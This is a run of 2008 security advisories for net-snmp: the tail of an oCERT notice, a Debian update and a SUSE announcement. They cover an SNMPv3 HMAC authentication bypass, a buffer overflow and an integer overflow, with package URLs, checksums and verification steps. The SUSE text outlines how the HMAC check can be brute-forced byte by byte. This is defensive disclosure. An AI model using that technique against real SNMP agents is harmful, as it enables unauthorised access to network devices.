affected vendors\n2008-06-06: added eCos to affected packages\n2008-06-09: patched net-snmp packages released\n2008-06-09: advisory release\n\nReferences:\nhttp://sourceforge.net/forum/forum.php?forum_id=833770\nhttp://sourceforge.net/tracker/index.php?func=detail\u0026aid=1989089\u0026group_id=12694\u0026atid=456380\nhttp://www.kb.cert.org/vuls/id/878044\n\nLinks:\nhttp://www.net-snmp.org\nhttp://www.ece.ucdavis.edu/ucd-snmp\nhttp://ecos.sourceware.org\n\nPermalink:\nhttp://www.ocert.org/advisories/ocert-2008-006.html\n\n-- \nAndrea Barisani |                Founder \u0026 Project Coordinator\n          oCERT | Open Source Computer Emergency Response Team\n\n\u003clcars@ocert.org\u003e                         http://www.ocert.org\n 0x864C9B9E 0A76 074A 02CD E989 CE7F AC3F DA47 578E 864C 9B9E\n        \"Pluralitas non est ponenda sine necessitate\"\n. The Common\nVulnerabilities and Exposures project identifies the following problems:\n \nCVE-2008-0960\n \n    Wes Hardaker reported that the SNMPv3 HMAC verification relies on\n    the client to specify the HMAC length, which allows spoofing of\n    authenticated SNMPv3 packets. \n \nCVE-2008-2292\n \n    John Kortink reported a buffer overflow in the __snprint_value\n    function in snmp_get causing a denial of service and potentially\n    allowing the execution of arbitrary code via a large OCTETSTRING \n    in an attribute value pair (AVP). \n \nCVE-2008-4309\n\n    It was reported that an integer overflow in the\n    netsnmp_create_subtree_cache function in agent/snmp_agent.c allows   \n    remote attackers to cause a denial of service attack via a crafted  \n    SNMP GETBULK request. \n\nFor the stable distribution (etch), these problems has been fixed in\nversion 5.2.3-7etch4. \n \nFor the testing distribution (lenny) and unstable distribution (sid)\nthese problems have been fixed in version 5.4.1~dfsg-11. \n\nWe recommend that you upgrade your net-snmp package. \n\nUpgrade instructions\n- --------------------\n\nwget url\n        will fetch the file for you\ndpkg -i file.deb\n        will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n        will update the internal database\napt-get upgrade\n        will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n  http://security.debian.org/pool/updates/main/n/net-snmp/net-snmp_5.2.3-7etch4.diff.gz\n    Size/MD5 checksum:    94030 2ccd6191c3212980956c30de392825ec\n  http://security.debian.org/pool/updates/main/n/net-snmp/net-snmp_5.2.3-7etch4.dsc\n    Size/MD5 checksum:     1046 8018cc23033178515298d5583a74f9ff\n  http://security.debian.org/pool/updates/main/n/net-snmp/net-snmp_5.2.3.orig.tar.gz\n    Size/MD5 checksum:  4006389 ba4bc583413f90618228d0f196da8181\n\nArchitecture independent packages:\n\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-base_5.2.3-7etch4_all.deb\n    Size/MD5 checksum:  1214368 d579d8f28f3d704b6c09b2b480425086\n  http://security.debian.org/pool/updates/main/n/net-snmp/tkmib_5.2.3-7etch4_all.deb\n    Size/MD5 checksum:   855594 b5ccd827adbcefcca3557fa9ae28cc08\n\nalpha architecture (DEC Alpha)\n\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_alpha.deb\n    Size/MD5 checksum:  2169470 265835564ef2b0e2e86a08000461c53b\n  http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_alpha.deb\n    Size/MD5 checksum:   944098 5b903886ee4740842715797e3231602c\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_alpha.deb\n    Size/MD5 checksum:  1901802 5486eb1f2a5b076e5342b1dd9cbb12e2\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_alpha.deb\n    Size/MD5 checksum:   933202 e3210ba1641079e0c3aaf4a50e89aedd\n  http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_alpha.deb\n    Size/MD5 checksum:   835584 b14db8c5e5b5e2d34799952975f903fb\n\namd64 architecture (AMD x86_64 (AMD64))\n\n  http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_amd64.deb\n    Size/MD5 checksum:   932008 fc79672bf64eaabd41ed1c2f4a42c7da\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_amd64.deb\n    Size/MD5 checksum:  1890766 ae3832515a97a79b31e0e7f0316356ee\n  http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_amd64.deb\n    Size/MD5 checksum:   835088 62867e9ba9dfca3c7e8ae575d5a478f5\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_amd64.deb\n    Size/MD5 checksum:   918844 d2d1bc5f555bc9dba153e2a9a964ffbf\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_amd64.deb\n    Size/MD5 checksum:  1557924 5c2a33a015dd44708a9cc7602ca2525c\n\narm architecture (ARM)\n\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_arm.deb\n    Size/MD5 checksum:   909974 4c1cef835efc0b7ff3fea54a618eabee\n  http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_arm.deb\n    Size/MD5 checksum:   835284 3ac835d926481c9e0f589b578455ddee\n  http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_arm.deb\n    Size/MD5 checksum:   928252 b98e98b58c61be02e477185293427d5c\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_arm.deb\n    Size/MD5 checksum:  1778292 b903adf3d1fa6e7a26f7cafb7bffdd6b\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_arm.deb\n    Size/MD5 checksum:  1344158 78b6cf6b2974983e8e3670468da73cd1\n\nhppa architecture (HP PA RISC)\n\n  http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_hppa.deb\n    Size/MD5 checksum:   835940 9eeaf116e386dd7733ab2106c662dfa9\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_hppa.deb\n    Size/MD5 checksum:  1809132 78bb5f1c12b004d32fa265e6bd99ffa1\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_hppa.deb\n    Size/MD5 checksum:  1926116 71c7f3095ffe1bb22e84ade21f32b3a4\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_hppa.deb\n    Size/MD5 checksum:   935434 85deac8531b02a0fdf3c9baa21d8e4bd\n  http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_hppa.deb\n    Size/MD5 checksum:   935640 958cb158264f75772864cd5d5c0bf251\n\ni386 architecture (Intel ia32)\n\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_i386.deb\n    Size/MD5 checksum:  1423294 f05c7491a8100684c5085588738f05b5\n  http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_i386.deb\n    Size/MD5 checksum:   833970 cb705c9fe9418cc9348ac935ea7b0ba2\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_i386.deb\n    Size/MD5 checksum:   920070 3df41a0c99c41d1bccf6801011cf8ed5\n  http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_i386.deb\n    Size/MD5 checksum:   925914 159b4244ef701edbe0fb8c9685b5b477\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_i386.deb\n    Size/MD5 checksum:  1838900 3b7ac7b8fe0da1a3909ee56aba46d464\n\nia64 architecture (Intel ia64)\n\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_ia64.deb\n    Size/MD5 checksum:  2205680 6868a56b1db04627e6921bf7237939a2\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_ia64.deb\n    Size/MD5 checksum:   970440 783f0cccabfbcc63590730b3803d164d\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_ia64.deb\n    Size/MD5 checksum:  2281114 fd04b505755a3aed0fe4c9baaac84500\n  http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_ia64.deb\n    Size/MD5 checksum:   842690 9f9ca89c3d3ba7c46481e9cd39c242a6\n  http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_ia64.deb\n    Size/MD5 checksum:   962854 c8a32f808d719357a5b6350e2b60794e\n\nmips architecture (MIPS (Big Endian))\n\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_mips.deb\n    Size/MD5 checksum:   895414 5dd919d188291cb3727d39b5e06c9e26\n  http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_mips.deb\n    Size/MD5 checksum:   927342 28c245db4d8ea82ba4075b27d674d72a\n  http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_mips.deb\n    Size/MD5 checksum:   833182 0e0b21e13d77de82bed7a38d30f65e4b\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_mips.deb\n    Size/MD5 checksum:  1769524 24bdc73a3d20c4046c7741957442c713\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_mips.deb\n    Size/MD5 checksum:  1717562 977ae5c34a127d32d8f2bf222de9a431\n\nmipsel architecture (MIPS (Little Endian))\n\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_mipsel.deb\n    Size/MD5 checksum:  1755032 cab5c112911465a9ce23a0d2ea44ded9\n  http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_mipsel.deb\n    Size/MD5 checksum:   926616 2bf14a3fe74d9f2a523aacc8b04f5282\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_mipsel.deb\n    Size/MD5 checksum:   895194 b7c9ed37bf83ad92371f5472ac5d917b\n  http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_mipsel.deb\n    Size/MD5 checksum:   833098 08b63ba6c3becf25ba2f941a532a7b71\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_mipsel.deb\n    Size/MD5 checksum:  1720642 1ff7568eb478edee923edb76cf42e9ac\n\npowerpc architecture (PowerPC)\n\n  http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_powerpc.deb\n    Size/MD5 checksum:   941434 bbac9384bd7f88339e2b86fa665208c1\n  http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_powerpc.deb\n    Size/MD5 checksum:   835212 4790d79f8de7f1bee7aabf0473f25268\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_powerpc.deb\n    Size/MD5 checksum:  1657890 b91fcf52e80c7196cea0c13df9ac79ef\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_powerpc.deb\n    Size/MD5 checksum:  1803262 4d298c9509941390c7b2eb68320ad211\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_powerpc.deb\n    Size/MD5 checksum:   928170 b17966a6a61313344ac827b58f32eeef\n\ns390 architecture (IBM S/390)\n\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_s390.deb\n    Size/MD5 checksum:  1409718 2a128cbdce2522ef49604255cff41af2\n  http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_s390.deb\n    Size/MD5 checksum:   931452 d3bb7c3a849cd2b35fa6e4acb19c318d\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_s390.deb\n    Size/MD5 checksum:  1834914 67e5b946df18b06b41b3e108d5ddc4e3\n  http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_s390.deb\n    Size/MD5 checksum:   836102 7a4b85e8ea0e50d7213997b5f7d6309f\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_s390.deb\n    Size/MD5 checksum:   903864 3f80e78e4e2672aacf3da0690ff24b79\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n  http://security.debian.org/pool/updates/main/n/net-snmp/snmp_5.2.3-7etch4_sparc.deb\n    Size/MD5 checksum:   925336 5824ea607689f3f1bd62a9e6e28f95ae\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9-dev_5.2.3-7etch4_sparc.deb\n    Size/MD5 checksum:  1548630 1378d1cf730d3026bc1f01a4ab2ccedb\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp-perl_5.2.3-7etch4_sparc.deb\n    Size/MD5 checksum:   918592 28a086f6aa2ee8d510b38c1a177843fc\n  http://security.debian.org/pool/updates/main/n/net-snmp/snmpd_5.2.3-7etch4_sparc.deb\n    Size/MD5 checksum:   834186 068cbf2b4774ecf9504b820db26e6f1d\n  http://security.debian.org/pool/updates/main/n/net-snmp/libsnmp9_5.2.3-7etch4_sparc.deb\n    Size/MD5 checksum:  1782014 d39fae5fe0d1397a2a1bd7397d6e850a\n\n\n  These files will probably be moved into the stable distribution on\n  its next update. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n______________________________________________________________________________\n\n                        SUSE Security Announcement\n\n        Package:                net-snmp\n        Announcement ID:        SUSE-SA:2008:039\n        Date:                   Fri, 01 Aug 2008 13:00:00 +0000\n        Affected Products:      openSUSE 10.2\n                                openSUSE 10.3\n                                openSUSE 11.0\n                                SUSE SLES 9\n                                Novell Linux Desktop 9\n                                Open Enterprise Server\n                                Novell Linux POS 9\n                                SUSE Linux Enterprise Desktop 10 SP1\n                                SLE SDK 10 SP1\n                                SLE SDK 10 SP2\n                                SUSE Linux Enterprise Server 10 SP1\n                                SUSE Linux Enterprise Desktop 10 SP2\n                                SUSE Linux Enterprise Server 10 SP2\n        Vulnerability Type:     authentication bypass, denial-of-service\n        Severity (1-10):        6\n        SUSE Default Package:   no\n        Cross-References:       CVE-2008-0960\n                                CVE-2008-2292\n\n    Content of This Advisory:\n        1) Security Vulnerability Resolved:\n            - authentication bypass\n            - denial-of-service\n           Problem Description\n        2) Solution or Work-Around\n        3) Special Instructions and Notes\n        4) Package Location and Checksums\n        5) Pending Vulnerabilities, Solutions, and Work-Arounds:\n            - viewvc/subversion\n        6) Authenticity Verification and Additional Information\n\n______________________________________________________________________________\n\n1) Problem Description and Brief Discussion\n\n   The net-snmp daemon implements the \"simple network management protocol\". \n   The version 3 of SNMP as implemented in net-snmp uses the length of the\n   HMAC in a packet to verify against a local HMAC for authentication. \n   An attacker can therefore send a SNMPv3 packet with a one byte HMAC and\n   guess the correct first byte of the local HMAC with 256 packets (max). \n\n   Additionally a buffer overflow in perl-snmp was fixed that can cause a\n   denial-of-service/crash. \n\n2) Solution or Work-Around\n\n   Please install the update package. \n\n3) Special Instructions and Notes\n\n   Please restart net-snmp after the update. \n\n4) Package Location and Checksums\n\n   The preferred method for installing security updates is to use the YaST\n   Online Update (YOU) tool. YOU detects which updates are required and\n   automatically performs the necessary steps to verify and install them. \n   Alternatively, download the update packages for your distribution manually\n   and verify their integrity by the methods listed in Section 6 of this\n   announcement. Then install the packages using the command\n\n     rpm -Fhv \u003cfile.rpm\u003e\n\n   to apply the update, replacing \u003cfile.rpm\u003e with the filename of the\n   downloaded RPM package. \n\n   \n   x86 Platform:\n   \n   openSUSE 11.0:\n   http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/libsnmp15-5.4.1-77.2.i586.rpm\n   http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/net-snmp-5.4.1-77.2.i586.rpm\n   http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/net-snmp-devel-5.4.1-77.2.i586.rpm\n   http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/perl-SNMP-5.4.1-77.2.i586.rpm\n   http://download.opensuse.org/pub/opensuse/update/11.0/rpm/i586/snmp-mibs-5.4.1-77.2.i586.rpm\n   \n   openSUSE 10.3:\n   http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/libsnmp15-5.4.1-19.2.i586.rpm\n   http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/net-snmp-5.4.1-19.2.i586.rpm\n   http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/net-snmp-devel-5.4.1-19.2.i586.rpm\n   http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/perl-SNMP-5.4.1-19.2.i586.rpm\n   http://download.opensuse.org/pub/opensuse/update/10.3/rpm/i586/snmp-mibs-5.4.1-19.2.i586.rpm\n   \n   openSUSE 10.2:\n   ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/net-snmp-5.4.rc2-8.i586.rpm\n   ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/net-snmp-devel-5.4.rc2-8.i586.rpm\n   ftp://ftp.suse.com/pub/suse/update/10.2/rpm/i586/perl-SNMP-5.4.rc2-8.i586.rpm\n   \n   x86-64 Platform:\n   \n   openSUSE 11.0:\n   http://download.opensuse.org/pub/opensuse/update/11.0/rpm/x86_64/net-snmp-32bit-5.4.1-77.2.x86_64.rpm\n   \n   openSUSE 10.3:\n   http://download.opensuse.org/pub/opensuse/update/10.3/rpm/x86_64/net-snmp-32bit-5.4.1-19.2.x86_64.rpm\n   \n   openSUSE 10.2:\n   ftp://ftp.suse.com/pub/suse/update/10.2/rpm/x86_64/net-snmp-32bit-5.4.rc2-8.x86_64.rpm\n   \n   Sources:\n   \n   openSUSE 11.0:\n   http://download.opensuse.org/pub/opensuse/update/11.0/rpm/src/net-snmp-5.4.1-77.2.src.rpm\n   \n   openSUSE 10.3:\n   http://download.opensuse.org/pub/opensuse/update/10.3/rpm/src/net-snmp-5.4.1-19.2.src.rpm\n   \n   openSUSE 10.2:\n   ftp://ftp.suse.com/pub/suse/update/10.2/rpm/src/net-snmp-5.4.rc2-8.src.rpm\n   \n   Our maintenance customers are notified individually. The packages are\n   offered for installation from the maintenance web:\n   \n   Open Enterprise Server\n     http://download.novell.com/index.jsp?search=Search\u0026keywords=71093bdfd49361f6dbe32a8fde43b848\n   \n   Novell Linux POS 9\n     http://download.novell.com/index.jsp?search=Search\u0026keywords=71093bdfd49361f6dbe32a8fde43b848\n   \n   Novell Linux Desktop 9\n     http://download.novell.com/index.jsp?search=Search\u0026keywords=71093bdfd49361f6dbe32a8fde43b848\n   \n   SUSE Linux Enterprise Server 10 SP1\n     http://download.novell.com/index.jsp?search=Search\u0026keywords=71093bdfd49361f6dbe32a8fde43b848\n   \n   SUSE Linux Enterprise Server 10 SP2\n     http://download.novell.com/index.jsp?search=Search\u0026keywords=71093bdfd49361f6dbe32a8fde43b848\n   \n   SLE SDK 10 SP2\n     http://download.novell.com/index.jsp?search=Search\u0026keywords=71093bdfd49361f6dbe32a8fde43b848\n   \n   SLE SDK 10 SP1\n     http://download.novell.com/index.jsp?search=Search\u0026keywords=71093bdfd49361f6dbe32a8fde43b848\n   \n   SUSE Linux Enterprise Desktop 10 SP1\n     http://download.novell.com/index.jsp?search=Search\u0026keywords=71093bdfd49361f6dbe32a8fde43b848\n   \n   SUSE Linux Enterprise Desktop 10 SP2\n     http://download.novell.com/index.jsp?search=Search\u0026keywords=71093bdfd49361f6dbe32a8fde43b848\n   \n   SUSE SLES 9\n     http://download.novell.com/index.jsp?search=Search\u0026keywords=71093bdfd49361f6dbe32a8fde43b848\n\n______________________________________________________________________________\n\n5) Pending Vulnerabilities, Solutions, and Work-Arounds:\n\n   - viewvc/subversion\n     This update of subversion fixes multiple vulnerabilities. \n     - CVE-2008-1290: list CVS or SVN commits on \"all-forbidden\" files\n     - CVE-2008-1291: directly access hidden CVSROOT folders\n     - CVE-2008-1292: expose restricted content via the revision view,\n                      the log history, or the diff view\n\n______________________________________________________________________________\n\n6) Authenticity Verification and Additional Information\n\n  - Announcement authenticity verification:\n\n    SUSE security announcements are published via mailing lists and on Web\n    sites. The authenticity and integrity of a SUSE security announcement is\n    guaranteed by a cryptographic signature in each announcement. All SUSE\n    security announcements are published with a valid signature. \n\n    To verify the signature of the announcement, save it as text into a file\n    and run the command\n\n      gpg --verify \u003cfile\u003e\n\n    replacing \u003cfile\u003e with the name of the file where you saved the\n    announcement. The output for a valid signature looks like:\n\n      gpg: Signature made \u003cDATE\u003e using RSA key ID 3D25D3D9\n      gpg: Good signature from \"SuSE Security Team \u003csecurity@suse.de\u003e\"\n\n    where \u003cDATE\u003e is replaced by the date the document was signed. \n\n    If the security team\u0027s key is not contained in your key ring, you can\n    import it from the first installation CD. To import the key, use the\n    command\n\n      gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc\n\n  - Package authenticity verification:\n\n    SUSE update packages are available on many mirror FTP servers all over the\n    world. While this service is considered valuable and important to the free\n    and open source software community, the authenticity and the integrity of\n    a package needs to be verified to ensure that it has not been tampered\n    with. \n\n    The internal rpm package signatures provide an easy way to verify the\n    authenticity of an RPM package. Use the command\n\n     rpm -v --checksig \u003cfile.rpm\u003e\n\n    to verify the signature of the package, replacing \u003cfile.rpm\u003e with the\n    filename of the RPM package downloaded. The package is unmodified if it\n    contains a valid signature from build@suse.de with the key ID 9C800ACA. \n\n    This key is automatically imported into the RPM database (on\n    RPMv4-based distributions) and the gpg key ring of \u0027root\u0027 during\n    installation. You can also find it on the first installation CD and at\n    the end of this announcement. \n\n  - SUSE runs two security mailing lists to which any interested party may\n    subscribe:\n\n    opensuse-security@opensuse.org\n        -   General Linux and SUSE security discussion. \n            All SUSE security announcements are sent to this list. \n            To subscribe, send an e-mail to\n                \u003copensuse-security+subscribe@opensuse.org\u003e. \n\n    opensuse-security-announce@opensuse.org\n        -   SUSE\u0027s announce-only mailing list. \n            Only SUSE\u0027s security announcements are sent to this list. \n            To subscribe, send an e-mail to\n                \u003copensuse-security-announce+subscribe@opensuse.org\u003e. \n\n    =====================================================================\n    SUSE\u0027s security contact is \u003csecurity@suse.com\u003e or \u003csecurity@suse.de\u003e. \n    The \u003csecurity@suse.de\u003e public key is listed below. \n    =====================================================================\n______________________________________________________________________________\n\n    The information in this advisory may be distributed or reproduced,\n    provided that the advisory is not modified in any way. In particular, the\n    clear text signature should show proof of the authenticity of the text. \n\n    SUSE Linux Products GmbH provides no warranties of any kind whatsoever\n    with respect to the information contained in this security advisory. \n\nType Bits/KeyID     Date       User ID\npub  2048R/3D25D3D9 1999-03-06 SuSE Security Team \u003csecurity@suse.de\u003e\npub  1024D/9C800ACA 2000-10-19 SuSE Package Signing Key \u003cbuild@suse.de\u003e\n\n- -----BEGIN PGP PUBLIC KEY BLOCK-----\nVersion: GnuPG v1.4.2 (GNU/Linux)\n\n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